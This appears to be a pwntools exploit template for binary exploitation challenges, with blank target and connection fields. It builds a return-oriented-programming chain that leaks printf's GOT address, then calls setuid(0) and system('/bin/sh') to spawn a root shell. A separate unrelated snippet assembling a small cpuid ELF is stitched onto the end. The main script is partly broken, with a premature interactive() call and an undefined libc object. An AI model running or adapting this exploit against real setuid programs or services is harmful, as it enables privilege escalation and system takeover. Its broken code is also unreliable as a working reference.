#!/usr/bin/env python3
from pwn import *

context.terminal = ['alacritty', '-e', 'zsh', '-c']
target = ''

context.binary = target
binary = ELF(target)

service_host = ""
service_port = 0

ssh_host = ''
ssh_user = ''
ssh_pass = ''
ssh_port = 22

if args['GDB']:
	p = gdb.debug(target,
	'''
	source /home/xct/tools/pwndbg/gdbinit.py
	continue
	''')
else:
	if args['SSH']:
		sh = ssh(host=ssh_host, user=ssh_user, password=ssh_pass, port=ssh_port)
		p = sh.run('/bin/bash')
		junk = p.recv(4096,timeout=2)
		p.sendline(target)
	else:
		if args['REMOTE']:			
			p = remote(service_host,service_port)
		else:
			p = process(target,setuid=True, level='DEBUG')

buf = b""

p.recvuntil("")
p.sendline(buf)
p.interactive()

rop = ROP(binary)
rop.call(binary.plt["printf"], [binary.got["printf"],"%s"])
rop.call(binary.symbols['_start'])
log.info(rop.dump())

buf = b""
buf += b"A"*100+rop.chain()
p.sendline(buf)

out = p.recvline()
out = out.strip(b"\n")
out = u64(out.ljust(8,b"\x00"))

rop = ROP(libc)
sh = next(libc.search(b"/bin/sh\x00"))
rop.call(libc.symbols['setuid'], [0x0])
rop.call(libc.symbols['system'], [sh])
log.info(rop.dump())

buf = b""
buf += b"A"*100+rop.chain()
p.sendline(buf)
p.interactive()

from pwn import *

context.arch = 'amd64'

code = """
    // cpuid
    mov     rax, 0x00
    cpuid
    // exit
    mov     rdi, 0x00
    mov     rax, 60
    syscall
"""

elf = make_elf_from_assembly(code,extract=True) #, shared=1)

with open('cpuid', 'wb') as f:
    f.write(elf)